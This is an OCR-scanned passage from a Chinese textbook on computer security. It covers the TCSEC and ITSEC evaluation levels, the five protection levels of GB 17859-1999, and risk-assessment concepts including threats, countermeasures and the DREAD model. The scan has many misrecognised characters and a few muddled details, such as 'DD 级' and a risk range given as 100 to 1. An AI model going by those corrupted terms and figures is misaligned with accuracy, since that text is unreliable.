实现 起 来 比较 困难 。 基 于 智能 卡 的 认证 技术 是 目前 比较 成 熟 的 技术 。 

(6) 入 侵 检测 技术 。 提 供 实 时 的 入 侵 检 测 和 采取 相应 的 手段 ,是 一 门 新 型 的 安全 防范 
技术 ,可 以 弥补 防火 墙 的 不 足 , 抵 御 来 自 网 络 内 部 的 攻击 。 

(7) 反 病毒 技术 。 包 含 病毒 预防 、 病 毒 检测 和 病毒 清除 。 主 要 方法 是 对 存储 器 上 的 信 
息 进行 扫描 和 检测 ,对 网 络 传输 进来 的 数据 进行 监测 。 
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信息 系统 安全 关键 技术 包括 风险 评估 信任 体系 、 可 信 计 算 、 访 问 控制 标识 与 鉴别 ( 认 
证 ) ,密码 学 (加 密 与 解密 )、 内 容 安 全 (包括 反 垃 圾 邮件 )、 安 全 应 用 、 防 病毒 安全 协议 、 恶 意 
行为 及 恶意 代码 检测 、 实 时 监控 、 无 线 通信 安全 ,检测 与 评估 (取证 ) 、 诅 入 式 安全 ,新 技术 ( 量 
子 密码 .生物 密码 ) ,信息 伪装 和 其 他 等 。 


1.4.3 计算 机 系统 安全 标准 


与 安全 领域 有 关 的 标准 主要 来 自 国际 标准 ,银行 工业 标准 、 国 家 政府 标准 和 Internet 标 
准 4 个 方面 。 有 关 信 息 技术 的 国际 标准 来 自 国际 标准 化 组 织 (ISO)、 国 际 电 工 委员 会 
(IEC) .国际 电信 联盟 (ITU, 原 称 为 CCITT) 和 电气 与 电子 工程 师 协 会 (IEEE) ,银行 工业 标 
准 来 自 ISO 和 美国 国家 标准 协会 (ANSI) ,国家 政府 标准 来 自 各 国政 府 制定 ,Internet 标准 
来 自 Internet 协会 。 

1. TCSEC 标准 

可 信 计 算 机 系统 评估 准则 橘 皮 书 (Trusted Computer System Evaluation Criteria， 
TCSEC) 是 计算 机 系统 安全 评估 的 第 一 个 正式 标准 ,具有 划时代 的 意义 。 它 于 1970 年 由 美 
国 国防 科学 委员 会 提出 ,并 于 1985 年 12 月 由 美国 国防 部 公布 。TCSEC 最 初 只 是 军用 标 
准 , 后 来 延至 民用 领域 ,是 国际 国内 评估 信息 系统 安全 的 指导 原则 ,提供 客观 的 一致 的 安全 
标准 。 

TCSEC 将 计算 机 系统 的 安全 划分 为 4 个 等 级 .7 个 安全 级 别 ( 从 低 到 高 依次 为 D.C1、 
C2、B1、B2、B3 和 A 级 )。DD 级 和 A 级 暂时 不 分 子 级 。 每 级 包括 它 下 级 的 所 有 特性 ,从 最 简 
单 的 系统 安全 特性 直到 最 高 级 的 计算 机 安全 模型 技术 ,不 同 计 算 机 信息 系统 可 以 根据 需要 
和 可 能 选用 不 同安 全 保密 程度 的 不 同 标准 。 

(1) D 级 。D 级 是 最 低 的 安全 形式 ,整个 计算 机 是 不 信任 的 ,只 为 文件 和 用 户 提供 安全 
保护 。D 级 系统 最 普通 的 形式 是 本 地 操作 系统 ,或 者 是 一 个 完全 没有 保护 的 网 络 ,对 于 硬件 
也 没有 任何 保护 措施 ,操作 系统 容易 受到 损害 ,没有 系统 访问 限制 和 数据 限制 ,任何 人 不 需 
要 任何 账户 就 可 以 进入 系统 ,不 受 任 何 限制 就 可 以 访问 他 人 的 数据 文件 。 这 个 级 别 的 操作 
系统 有 DOS、Windows 9x、Apple 公司 的 Macintosh System 7. 1 。 

(2) Cl 级 。C1l 级 又 称 为 有 选择 的 安全 保护 或 酌情 安全 保护 (Discretionary Security 
Protection) 系 统 , 它 要 求 系统 硬件 有 一 定 的 安全 保护 (如 硬件 有 带 锁 装 置 ,需要 钥匙 才能 使 
用 计算 机 ) ,用户 在 使 用 前 必须 登记 到 系统 。 人 允许 系统 管理 员 为 一 些 程序 或 数据 设立 访问 许 
可 权限 等 。C1 级 保护 的 不 足 之 处 在 于 用 户 可 以 直接 访问 操作 系统 的 根 目录 。C1 级 不 能 控 
制 进入 系统 的 用 户 访问 级 别 ,所 以 用 户 可 以 将 系统 中 的 数据 任意 移 走 ,可 以 控制 系统 配置 ， 
获取 比 系统 管理 员 所 允许 的 更 高 权限 ,如 改变 和 控制 用 户 名 。 

(3) C2 级 。 使 用 附加 身份 认证 就 可 以 让 一 个 C2 系统 用 户 在 不 是 根 用 户 的 情况 下 有 权 
执行 系统 管理 任务 。 身 份 认证 可 以 用 来 确定 用 户 是 否 能 够 执行 特定 的 命令 或 访问 某 些 核心 
表 , 可 以 分 组 分 级 授权 。 授 权 分 级 指 系 统管 理 员 能 够 给 用 户 分 组 ,授予 他 们 访问 某 些 程序 的 
权限 或 访问 分 级 目录 的 权限 。 另 一 方面 ,用 户 权 限 可 以 以 个 人 为 单位 授权 用 户 对 某 一 程序 
所 在 目录 进行 访问 。 如 果 其 他 程序 和 数据 也 在 同一 目录 下 ,那么 用 户 也 将 自动 得 到 访问 这 
些 信息 的 权限 。 

能 够 达到 C2 级 的 常见 的 操作 系统 有 UNIX 系统 、XENIX、Novell 3. x 或 更 高 版 本 、 
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Windows NT 和 Windows 2000。 

(4) Bl 级 。B 级 中 有 三 个 级 别 , Bl 级 即 标 号 安全 保护 (Labeled Security Protection)， 
是 支持 多 级 安全 (如 秘密 和 绝密 ) 的 第 一 个 级 别 ,这 个 级 别 说 明 一 个 处 于 强制 性 访问 控制 之 
下 的 对 象 ,系统 不 允许 文件 的 拥有 者 改变 其 许可 权限 。 即 在 这 一 级 别 上 ,对 象 ( 如 盘 区 和 文 
件 服务 器 目录 ) 必 须 在 访问 控制 之 下 ,不 允许 拥有 者 更 改 它们 的 权限 。 

(5) B2 级 。B2 级 又 叫 作 结构 保护 (Structured Protection) 级 别 , 它 要 求 计 算 机 系统 中 
所 有 的 对 象 都 加 标签 ,而 且 给 设备 (磁盘 、 磁 带 和 终端 ) 分 配 单个 或 多 个 安全 级 别 。 它 提出 了 
较 高 安全 级 别 的 对 象 与 男 一 个 较 低 安全 级 别 的 对 象 通信 的 第 一 个 级 别 。 

(6) B3 级 。B3 级 又 称 为 安全 域 (Security Domain) 级 别 , 它 使 用 安装 硬件 的 方式 来 加 
强 域 。 例 如 ,内 存 管理 硬件 用 于 保护 安全 域 免 遭 无 授权 访问 或 其 他 安全 域 对 象 的 修改 。 该 
级 别 也 要 求 用 户 通 过 一 条 可 信任 途径 连接 到 系统 上 。 

(7) A 级 。A 级 也 称 为 验证 保护 或 验证 设计 (Verity Design) 级 别 ,是 当前 的 最 高 级 别 ， 
它 包括 一 个 严格 的 设计 ,控制 和 验证 过 程 。 与 前 面 提 到 的 各 级 别 一 样 ,这 一 级 别 包 含 了 较 低 
级 别 的 所 有 特性 。 设 计 必 须 是 从 数学 角度 上 经 过 验证 的 ,而 且 必 须 进行 秘密 通道 和 可 信任 
分 布 的 分 析 。 可 信任 分 布 (Trusted Distribution) 的 含义 是 硬件 和 软件 在 物理 传输 过 程 中 已 
经 受到 保护 ,以 防止 破坏 安全 系统 。 

可 信 计 算 机 安全 评价 标准 主要 考虑 的 安全 问题 大 体 上 还 局 限于 信息 的 保密 性 , 随 着 计 
算 机 和 网 络 技术 的 发 展 ,对 于 目前 的 系统 安全 不 能 完全 适用 。 

2. ITSEC 标准 

ITSEC( 信 息 技术 安全 评估 标准 ) 是 欧洲 的 分 类 手册 。 像 美国 的 橘 皮 书 一 样 ,欧洲 的 
ITSEC 标准 目录 将 IT 系统 划分 为 7 个 安全 类 (E0-E6) 。 

ITSEC 与 TCSEC 的 对 应 如 下 : 


E0 D 
El Cl 
E2 C2 
E3 Bl 
E4 B2 
E5 B3 
E6 Al 
1.4.4 信息 系统 安全 保护 等 级 划分 
信息 系统 安全 保护 等 级 是 具有 相应 的 基本 安全 保护 能 力 的 等 级 。 国 家 标准 GB 17859- 
1999 是 信息 安全 等 级 保护 系列 标准 编制 ,系统 建设 与 管理 .产品 研发 ,监督 检查 的 科学 技术 
基础 和 依据 。 信 息 系统 的 安全 性 从 低 到 高 划分 为 5 个 等 级 ,分 别 是 用 户 自主 保护 级 ,系统 审 
计 保 护 级 、 安 全 标记 保护 级 、 结 构 化 保护 级 和 访问 验证 保护 级 。 高 级 别 安全 要 求 是 低级 别 要 


求 的 超 集 。 
1. 第 一 级 : 用 户 自主 保护 级 
通过 可 信 计 算 基 TCB 隔离 用 户 与 数据 ,使 用 户 具备 自主 安全 保护 的 能 力 。TCB 是 指 
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计算 机 系统 内 保护 装置 的 总 体 , 包 括 硬件 .固件 .软件 和 负责 执行 安全 策略 的 组 合体 。 它 具 
有 多 种 形式 的 控制 能 力 , 对 用 户 实施 访问 控制 , 即 为 用 户 提供 可 行 的 手段 ,保护 用 户 和 用 户 
组 信息 ,避免 其 他 用 户 对 数据 的 非法 读 写 与 破坏 。 

允许 命名 用 户 以 用 户 或 用 户 组 的 身份 规定 并 控制 对 客体 的 共享 ,并 阻止 非 授权 用 户 读 
取 敏感 信息 。 可 以 通过 TCB 自主 地 定义 主体 对 客体 的 访问 权限 。 为 用 户 提供 身份 鉴别 ,要 
求 用 户 标识 自己 的 身份 ,并 实施 对 客体 的 自主 访问 控制 ,避免 “非法 ?用 户 数据 的 读 / 写 或 
破坏 。 

2. 第 二 级 : 系统 审计 保护 级 

本 级 TCB 实施 了 粒度 更 细 的 自主 访问 控制 ,通过 登录 过 程 .审计 与 安全 相关 的 事件 和 
隔离 资源 等 措施 ,使 用 户 对 自己 的 行为 负责 。 实 施 自 主 访问 控制 和 客体 (Object, 信 息 的 载 
体 ) 的 安全 重用 。 控 制 粒度 是 单个 用 户 , 并 控制 访问 控制 的 扩散 , 即 没 有 访问 权 的 用 户 只 允 
许 由 授权 用 户 指定 其 对 客体 的 访问 权 。 客 体 在 安全 重用 之 前 必须 撤销 其 所 含 信息 的 授权 和 
前 主体 的 使 用 信息 。 身 份 鉴别 为 用 户 提供 唯一 的 标识 ,确保 用 户 对 自己 的 行为 负责 ,具有 将 
身份 标识 与 用 户 所 有 可 审计 的 行为 相关 联 的 能 力 。 

TCB 能 创建 和 维护 受 保护 客体 的 访问 审计 跟踪 记录 ,并 能 阻止 非 授权 的 用 户 对 它 访问 
或 破坏 。TCB 能 记录 下 述 事件 : 使 用 身份 鉴别 机 制 , 将 客体 引入 用 户 地址 空间 (例如 打开 
文件 程序 初始 化 ) ,删除 客体 、 由 任何 操作 员 实 施 的 动作 以 及 其 他 与 系统 安全 有 关 的 事件 。 
审计 记录 包括 事件 的 日 期 和 时 间 、 用 户 、 事 件 类 型 事件 是 否 成 功 . 来 源 、 客 体 名 等 。TCB 提 
供 审计 记录 接口 和 并 发 控制 机 制 。 

3. 第 三 级 : 安全 标记 保护 级 

TCB 除了 具有 系统 审计 保护 级 的 所 有 功能 外 ,还 提供 有 关 安 全 策略 模型 .数据 标记 以 
及 主体 对 客体 强制 访问 控制 的 非 形式 化 描述 ,具有 准确 地 标记 输出 信息 的 能 力 ,可 消除 通过 
测试 发 现 的 任何 错误 。TCB 定义 和 控制 系统 中 命名 用 户 对 命名 客体 的 访问 ,允许 命名 用 户 
自主 控制 访问 客体 的 共享 和 授权 ,阻止 非 授权 用 户 读 取 敏 感 信息 ,并 控制 访问 权限 扩散 。 
TCB 对 所 有 主体 及 其 所 控制 的 客体 (例如 进程 .文件 . 段 . 设 备 ) 指 定 敏感 标记 (Sensitivity 
Label, 表 示 客 体 安全 级 别 并 描述 客体 数据 敏感 性 的 一 组 信息 ,可 信 计 算 基 中 把 敏感 标记 作 
为 强制 访问 控制 决策 的 依据 ) ,并 实施 强制 访问 控制 。 

TCB 支持 两 种 或 两 种 以 上 成 分 组 成 的 安全 级 。 所 有 主体 对 客体 的 访问 应 满足 : 仅 当 
主体 安全 级 中 的 等 级 分 类 高 于 或 等 于 客体 安全 级 中 的 等 级 分 类 , 且 主 体 安全 级 中 的 非 等 级 
类 别 包含 了 客体 安全 级 中 的 全 部 非 等 级 类 别 ,主体 才能 读 客体 ; 仅 当 主体 安全 级 中 的 等 级 分 
类 低 于 或 等 于 客体 安全 级 中 的 等 级 分 类 , 且 主 体 安 全 级 中 的 非 等 级 类 别 包 含 了 客体 安全 级 
中 的 非 等 级 类 别 ,主体 才能 写 一 个 客体 。 使 用 身份 鉴别 和 数据 鉴别 ,输入 未 加 安全 标记 的 数 
据 ,TCB 审计 并 要 求 授权 用 户 接 受 这 些 数据 的 安全 级 别 。 从 用 户 角 度 看 ,此 级 也 包括 身份 
鉴别 和 安全 审计 两 大 功能 。 

TCB 除了 有 具有 第 二 级 的 功能 外 ,还 有 以 下 功能 : 

(1) 确定 用 户 的 访问 权限 和 授权 数据 。 

(2) 接受 数据 的 安全 级 别 , 维 护 与 每 个 主体 基本 控制 下 的 存储 对 象 相关 的 敏感 标记 。 

(3) 维护 标记 的 完整 性 。 

(4) 维护 并 审计 标记 信息 的 输出 ,并 与 相关 联 的 信息 进行 匹配 。 
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(5) 确保 以 该 用 户 身份 在 TCB 外 部 创建 的 主体 和 授权 , 受 其 访问 权 和 授权 的 控制 。 

TCB 通过 自主 和 强制 完整 性 策略 ,使 用 完整 性 敏感 标记 ,阻止 非 授 权 用 户 修改 或 破坏 
敏感 信息 。 

4. 第 四 级 : 结构 化 保护 级 

TCB 建立 在 一 个 明确 定义 的 形式 化 安全 策略 模型 之 上 ,要 求 将 第 三 级 系统 中 的 自主 和 
强制 访问 控制 扩展 到 所 有 主体 与 客体 。 考 虑 隐蔽 通道 (Covert Channel, 允许 进程 以 危害 系 
统 安全 策略 的 方式 传输 信息 的 通信 信道 ),TCB 必须 结构 化 为 关键 保护 元 素 和 非 关键 保护 
元 素 , 具 有 相当 的 抗 渗透 能 力 。TCB 的 接口 也 必须 明确 定义 ,能 经 受 更 充分 的 测试 和 更 完 
整 的 复审 。 加 强 了 鉴别 机 制 ,支持 系统 管理 员 和 操作 员 的 职能 ,提供 可 信 设 施 管理 ,增强 了 
配置 管理 控制 。 本 级 的 主要 特征 如 下 : 

(1) TCB 基于 一 个 明确 定义 的 形式 化 安全 保护 策略 。 

(2) 将 第 三 级 实施 的 (自主 和 强制 ) 访 问 控制 扩展 到 所 有 主体 和 客体 : 在 自主 访问 控制 
方面 ,TCB 应 维护 由 TCB 外 部 主体 直接 或 间接 访问 的 所 有 资源 的 敏感 标记 ;在 强制 访问 控 
制 方面 ,TCB 应 对 所 有 可 被 其 外 部 主体 直接 或 间接 访问 的 资源 实施 强制 访问 控制 ,应 为 这 
些 主体 和 客体 指定 敏感 标记 。 

(3) 针对 隐蔽 信道 ,将 TCB 构造 成 为 关键 保护 元 素 和 非 关键 保护 元 素 。 

(4) TCB 具有 合理 定义 的 接口 ,使 其 能 够 经 受 严格 的 测试 和 复查 。 

(5) 通过 提供 可 信 路 径 来 增强 鉴别 机 制 。 

(6) 支持 系统 管理 员 和 操作 员 的 可 确认 性 ,提供 可 信 的 实施 管理 方法 ,增强 严格 的 配置 
管理 控制 。 

在 审计 方面 ,TCB 能 够 检测 事件 的 发 生 、 记 录 审 计 条 目 、 通 知 系统 管理 员 、 标 识 并 审计 
可 能 利用 隐蔽 信道 的 事件 。 在 隐蔽 信道 分 析 方面 ,彻底 搜索 隐蔽 存储 信道 ,测量 或 估算 信道 
的 最 大 带宽 。 

5. 第 五 级 : 访问 验证 保护 级 

TCB 满足 访问 监控 器 需求 。 访 问 监控 器 (Reference Monitor, 监控 主体 和 客体 之 间 授 
权 访问 关系 的 部 件 ) 仲 裁 主体 对 客体 的 全 部 访问 。 访 问 监控 器 本 身 是 抗 自 改 的 ,必须 足够 
小 ,能 够 分 析 和 测试 。TCB 在 设计 和 实现 时 排除 那些 对 实施 安全 策略 来 说 并 非 必要 的 代 
码 ; 将 其 复杂 性 降低 到 最 小 程度 ,支持 安全 管理 员 职 能 ,扩充 审计 机 制 , 当 发 生 与 安全 相关 的 
事件 时 发 出 信号 ,提供 系统 恢复 机 制 。 系 统 具 有 很 高 的 抗 渗 透 能 力 。 

与 第 四 级 相 比 ,主要 区 别 是 : 

(1) 在 TCB 的 构造 方面 ,具有 访问 监控 器 。 

(2) 在 自主 访问 控制 方面 ,能 够 为 每 个 客体 指定 用 户 和 用 户 组 ,并 规定 它们 对 客体 的 访 
问 模 式 。 

(3) 扩展 了 审计 能 力 ,能 够 监控 可 审计 安全 事件 的 发 生 和 积累 , 当 积 累 超过 规定 的 门限 
值 时 能 立即 发 出 报警 并 能 以 最 小 的 代价 终止 它们 。 

(4) 可 信 恢 复方 面 ,提供 了 一 组 过 程 和 相应 的 机 制 , 保 证 系统 失效 或 中 断后 ,可 以 在 不 
损害 任何 安全 保护 性 能 的 情况 下 进行 恢复 。 
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1.4.5 计算 机 系统 的 风险 评估 


风险 是 构成 安全 基础 的 基本 观念 。2007 年 4 月 ,国际 标准 化 组 织 在 加 拿 大 第 四 次 风险 
管理 工作 组 会 议 上 定义 “风险 ”为 : 不 确定 性 对 目标 的 影响 (effect of uncertainty on 
objectives)。 因 此 ,风险 是 未 来 事件 发 生 可 能 性 的 不 确定 性 、 损 失 的 损害 程度 或 大 小 的 不 确 
定性 。 

1. 安全 风险 概念 

安全 风险 是 特定 的 威胁 利用 资产 的 一 种 或 多 种 脆弱 性 ,导致 资产 的 丢失 或 损害 的 潜在 
可 能 性 , 即 特定 威胁 事件 发 生 的 可 能 性 与 后 果 的 结合 。 

(1) 资产 (Asset)。 资 产 就 是 被 组 织 赋予 了 价值 .需要 保护 的 有 用 资源 。 资 产 具 有 拥有 
者 (Owner) ,固定 价值 ,固定 价值 期 间 、 循 环 价值 等 属性 。 

信息 资产 包括 数据 资产 ,软件 资产 ,设备 资产 、 服 务 资产 、 人 力 资产 和 知识 产权 等 无 形 资 
产 。 信 息 资产 一 旦 受到 威胁 和 破坏 ,就 会 带 来 两 类 损失 :一 类 是 即时 的 损失 ,如 由 于 系统 被 
破坏 而 降低 了 劳动 生产 率 ; 另 一 类 是 从 系统 失效 到 恢复 正常 需要 的 花费 等 。 为 了 有 效 保护 
资产 ,采取 一 些 安全 措施 就 要 付出 安全 的 操作 代价 。 

(2) 脆弱 性 (Vulnerability) 。 也 称 为 漏洞 ,就 是 资产 本 身 所 具有 的 功能 弱点 ,造成 攻击 
的 可 能 途径 。 这 些 弱 点 或 可 能 被 威胁 利用 造成 安全 事件 的 发 生 ,从 而 对 资产 造成 损害 。 漏 
洞 可 以 分 为 已 知 漏洞 和 未 知 漏洞 ,可 能 存在 于 网 络 .主机 和 系统 各 个 部 分 。 已 知 漏洞 可 以 通 
过 使 用 软件 补丁 .特定 配置 排除 。 零 日 漏洞 是 已 公布 但 没有 相应 补丁 或 措施 的 漏洞 。 漏 洞 
可 能 发 生 在 系统 的 特殊 模块 ,布局 用户、 操作 人 员 中 ,也 可 能 发 生 在 相关 的 规章 .操作 或 商 
业 过 程 中 。 
(3) 攻击 。 攻 击 是 利用 漏洞 对 资产 进行 非法 操作 或 破坏 的 事件 ,具有 类 型 入口 点 、 标 
签 和 附加 文档 等 属性 。 

类 型 (Type) 用 以 标志 不 同类 别 的 攻击 ,由 攻击 目的 ,数量 、 可 用 工具 、 资 源 访问 方式 决 
定 , 例 如 黑客 .内 盗用 户 。 入 口 点 (Entry Point) 是 系统 的 一 个 “ 门 ”, 可 以 存在 于 系统 ,也 可 
以 存在 于 攻击 者 用 于 渗透 系统 的 行为 中 ,一 个 攻击 可 能 具有 多 个 具体 的 入 口 点 。 标 签 
(Tag) 是 自由 描述 与 资产 .漏洞 .威胁 有 关 属 性 的 文字 ,可 以 辅助 分 析 人 员 区 分 攻击 条 目 ,加 
强 威胁 模型 的 可 理解 性 。 附 加 文档 (Attached Document) 包 含 与 威胁 分 析 条 目 及 分 析 过 程 
有 关 的 非 结 构 化 信息 ,例如 安全 注解 .标准 规范 、 开 发 思想 和 设计 模式 。 附 加 文档 可 与 特定 
资产 ,漏洞 .对策 以 及 威胁 分 析 过 程 中 任何 一 步 的 威胁 模型 相关 联 。 

(4) 威胁 。 指 利用 漏洞 对 资产 造成 潜在 的 、 恶 意 的 或 可 能 的 损害 原因 ,由 资产 ,漏洞 和 
攻击 组 合 在 一 起 构成 ,包含 目标 .代理 和 事件 三 个 组 成 部 分 。 威 胁 的 属性 包括 威胁 的 主体 
(威胁 源 ) 能力、 资源 动机、 途径 .可 能 性 等 ,扩展 属性 包括 发 生 概率 ,资产 损害 等 级 、 损 害 、 
最 大 风险 .最 小 风险 .当前 风险 、 推 荐 对 策 .缓解 计划 、 对 策 缓解 等 级 .最 大 缓解 程度 、 现 行 组 
解 程度 等 。 

Q@ 目标 。 威胁 的 目标 通常 是 针对 安全 属性 或 安全 服务 ,包括 机 密 性 、 完 整 性 、 可 用 性 和 
可 审 性 等 ,是 威胁 背后 的 真正 理由 或 动机 。 一 个 威胁 可 能 有 几 个 目标 ,例如 可 审 性 可 能 是 攻 
击 的 首要 目标 ,这 样 可 防止 留 下 攻击 者 的 记录 ,然后 把 机 密 性 作为 攻击 目标 ,以 获取 一 些 关 
键 数据 。 
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@ 代理 。 代 理 需 要 有 访问 、 知 识 和 动机 三 个 特性 。 一 个 代理 必须 有 直接 或 间接 访问 目 
标 (系统 、 网 络 \ 设 施 或 信息 ) 的 能 力 , 必 须 具 有 攻击 目标 的 有 用 知识 ,如 用 户 ID .口令 .文件 
位 置物 理 访问 过 程 、 网 络 地 址 、 安 全 程序 等 ,具有 可 以 从 目标 获 利 的 动机 ,如 为 了 竞争 、 挑 
战 .贪心 或 恶意 伤害 企图 。 代 理 对 目标 越 熟 悉 , 就 具有 越 多 的 漏洞 知识 ;漏洞 知识 越 具 体 ,就 
越 能 非法 进入 系统 。 可 以 定量 的 判断 代理 对 访问 系统 的 必要 性 和 根据 漏洞 攻击 的 可 能 性 。 

@ 事件 。 事件 是 代理 恶意 或 偶然 地 采取 的 导致 组 织 或 系统 受到 伤害 的 行为 或 过 程 。 
常见 的 事件 有 对 人 信息、 系统、 场地 滥用 授权 访问 ; 非 授 权 访问 或 物理 损害 ;改变 信息 ;引入 对 
系统 的 恶意 软件 ;破坏 内 部 或 外 部 的 通信 ;窃听 内 部 或 外 部 的 通信 ; 偷 穷 硬件 等 。 

(5) 对 策 (Countermeasure) 。 对 策 是 用 来 解决 威胁 并 降低 风险 的 一 系列 安全 措施 ,一 
个 对 策 可 能 缓解 多 个 漏洞 。 对 策 具 有 固定 代价 .固定 代价 期 间 .循环 代价 .加 权 代价 ,总 缓解 
度 .代价 绩效 等 属性 。 

固定 代价 (Fixed Cost) 是 实现 对 策 时 需要 的 一 次 性 花费 的 估算 值 , 主 要 用 于 购买 设备 、 
增强 软件 。 循 环 代 价 (Recurring Cost) 是 由 于 实现 对 策 而 导致 的 各 种 循环 代价 ,例如 管理 人 
员 的 薪水 ,保险 费用 。 加 权 代 价 (Weighted Cost) 是 对 策 固 定 代 价 和 循环 代价 计算 的 加 权 平 
均 。 总 缓解 度 (Overall Mitigation) 是 特定 措施 对 降低 系统 风险 所 获得 的 缓解 程度 ,通常 表 
示 为 百分比 。 代 价 绩效 (Cost Effectiveness) 反 映 了 特定 措施 总 缓解 度 与 实现 代价 的 关系 。 
代价 绩效 并 不 考虑 为 减少 系统 风险 已 经 实施 的 对 策 ,也 不 一 定 能 够 反映 出 推荐 应 该 实现 的 
对 策 。 

2. 风险 模型 

风险 模型 由 资产 .漏洞 .威胁 和 对 策 等 组 成 。 系 统 风险 模型 具有 的 属性 包括 最 大 风险 、 
最 小 风险 .当前 风险 ,资产 总 值 \ 对 策 实 现代 价 .当前 实现 总 投资 。 最 大 风险 (Maximal Risk) 
是 威胁 可 能 对 资产 造成 最 大 风险 的 计算 值 , 要 考虑 对 资产 威胁 的 各 种 参数 。 最 小 风险 
(Minimal Risk) 是 所 有 缓解 对 策 实 现 后 的 威胁 造成 的 风险 计算 值 , 是 可 以 达到 的 最 低 风 险 。 
当前 风险 (current Risk) 是 已 知 威胁 在 当前 对 策 实 现 水 平 中 造成 的 实际 风险 计算 值 。 资 产 
总 值 由 所 有 资产 的 价值 计算 获得 。 对 策 实 现代 价 反映 实现 所 有 缓解 计划 中 所 有 对 策 需要 的 
代价 。 当 前 实现 总 投资 表示 当前 实际 用 于 实现 缓解 方案 对 策 的 投资 。 

风险 是 威胁 和 漏洞 综合 起 来 的 结果 。 没 有 漏洞 的 威胁 没有 风险 ,没有 威胁 的 漏洞 也 没 
有 风险 。 漏 洞 和 威胁 是 测定 风险 的 两 个 组 成 部 分 。 

风险 的 度量 是 要 确定 事件 发 生 的 可 能 性 。 风 险 可 划分 成 低 、 中 、 高 三 个 级 别 。 低 级 风险 
是 漏洞 使 组 织 和 系统 的 风险 达到 一 定 水 平 ,然而 威胁 不 一 定 发 生 ,去 除 这 些 漏洞 应 权衡 代价 
和 能 减少 的 风险 损失 。 中 级 风险 是 漏洞 使 组 织 和 系统 的 风险 (机 密 性 ,完整 性 、 可 用 性 ,可 审 
性 ) 达 到 相当 的 水 平 ,并 且 有 发 生 事件 的 现实 可 能 性 ,应 采取 措施 去 除 。 高 级 风险 是 漏洞 对 
组 织 和 系统 的 机 密 性 \ 完 整 性 、 可 用 性 和 可 审 性 已 构成 现实 危害 ,必须 立即 去 除 。 

风险 的 计算 公式 是 Risk 二 威胁 发 生 的 可 能 性 X 潜 在 损失 。 潜 在 损失 是 系统 遭受 攻击 
后 的 结果 。 如 果 发 生 概 率 取 值 范围 是 1 一 10,1 表示 不 太 可 能 发 生 ,10 表示 几乎 肯定 发 生 ， 
而 潜在 损失 取 值 范围 也 是 1~10,1 表示 最 小 损失 ,10 表示 灾难 , 则 风险 取 值 范围 是 从 100 
到 1, 评定 为 高 .中 、 低 风险 三 个 等 级 。 高 风险 威胁 需要 立刻 设法 缓解 ,中 风险 紧急 程度 有 所 
下 降 , 低 风险 可 以 根据 缓解 方案 代价 而 被 忽略 。 

风险 等 级 的 评价 可 以 采用 DREAD 模型 ,通过 询问 以 下 问题 ,根据 需要 制定 高 .中 、 低 的 


取 值 范围 ,获得 参考 等 级 : 

(1) 潜在 损失 (Damage potential, D) : 如 果 漏 洞 被 利用 损失 有 多 大 ? 

(2) 再 现 性 (Reproducibility, R): 攻击 再 次 出 现 是 否 容易 ? 

(3) 可 利用 性 (Exploitability, E) : 实施 一 次 攻击 是 否 容易 ? 

(4) 受 影响 用 户 (Affected users, A): 有 多 少 用 户 受 到 影响 ? 可 以 大 致 估计 百分比 。 

(5) 可 发 现 性 (Discoverability, D) : 发 现 漏洞 是 否 容易 ? 

还 可 以 询问 相关 的 其 他 问题 如 声誉 (Reputation) 等 用 以 评定 威胁 。 

3. 风险 识别 与 分 析 

识别 资产 (Identify Assets) 是 标识 出 系统 中 需要 保护 的 资产 。 任 何 有 效 的 风险 分 析 始 
于 需要 保护 的 资产 和 资源 的 鉴别 ,信息 资产 的 类 型 一 般 可 分 成 以 下 4 类: 物理 资源 (具有 物 
理 形态 的 计算 机 设备 资产 ) 知识 资源 (以 电子 的 形式 存在 的 任何 信息 ) 时间 资源 和 信誉 ( 感 
党) 资源 。 

识别 漏洞 时 ,从 确定 对 该 组 织 的 所 有 入口 开始 ,也 就 是 寻找 该 组 织 内 的 系统 和 信息 的 所 
有 访问 点 。 这 些 入 口 包 括 Internet 的 连接 .远程 访问 点 .与 其 他 组 织 的 连接 .设备 的 物理 访 
问 以 及 用 户 访问 点 等 。 对 每 个 访问 点 识别 可 访问 的 信息 和 系统 ,然后 识别 如 何 通过 入 口 
访问 。 

漏洞 不 仅 和 计算 机 系统 、 网 络 有 关 , 而 且 和 物理 场地 安全 、 员 工 情况 ,传送 中 的 信息 安全 
等 有 关 。 漏 洞 的 多 少 是 由 需要 打开 系统 的 技术 熟练 水 平和 困难 程度 来 确定 的 ,还 要 考虑 漏 
洞 暴露 的 后 果 。 如 果 漏 洞 易 于 暴露 ,攻击 者 通过 它 可 以 完全 控制 系统 , 则 称 高 值 漏洞 或 高 脆 
弱 性 。 如 果 攻 击 者 需要 对 设备 和 人 员 投入 很 多 资源 ,漏洞 才能 暴露 ,并 且 由 此 攻击 系统 也 只 
能 获取 一 般 信息 ,而 非 敏感 信息 , 则 称 低 值 漏洞 或 低 脆弱 性 。 

采用 简洁 的 图 表 将 计算 机 系统 的 体系 结构 进行 安全 剖面 分 析 , 概 括 为 文档 ,包括 子 系 
统 、 信 任 边界 和 数据 流 。 安 全 剖面 的 功能 是 分 解 程序 发 现 系统 在 设计 、 实 现 和 部 署 配置 中 漏 
洞 。 识 别 程序 功能 可 以 借助 用 例 图 ,并 发 现 业务 规则 误 用 中 隐 含 的 关联 。 分 解 系统 程序 的 
目标 是 产生 信任 边界 .数据 流 、. 人 入 口 点 .权限 代码 和 安全 前 面 。 程 序 分 解 越 细致 , 越 容 易 发 现 
潜在 威胁 。 

识别 信任 边界 (Identify Trust Boundaries) 作 用 于 系统 中 每 一 个 实际 资产 。 对 于 其 中 
每 个 子 系统 ,考查 上 游 数据 流 、 用 户 输 入 或 者 函数 调用 是 否 可 信 , 否 则 就 需要 考虑 如 何 保证 
数据 或 函数 调用 的 认证 和 授权 要 求 。 安 全 人 员 有 责任 确保 合适 的 监管 机 制 能 够 守护 特殊 信 
任 边 界 的 所 有 人口 点 ,作为 接收 方 的 入口 点 必须 验证 所 有 穿越 信任 边界 的 数据 。 

识别 数据 流 (Identify Data Flow) 的 简单 方式 是 从 系统 最 高 层 开始 ,然后 迭代 分 析 独 立 
子 系统 之 间 的 数据 流 ,进而 深入 到 组 件 。 穿 越 信任 边界 的 数据 流 尤 为 重要 ,将 外 部 数据 传人 
信任 域 时 ,要 求 假定 数据 存在 恶意 ,必须 进行 严格 的 检查 。 数 据 流 图 .时 序 图 有 助 于 通过 形 
式 化 的 方式 分 解 系统 。 

识别 入 口 点 (Identify Entry Points) 可 以 发 现 攻 击 和 人口 。 系 统 入 口 点 有 可 能 就 是 攻击 
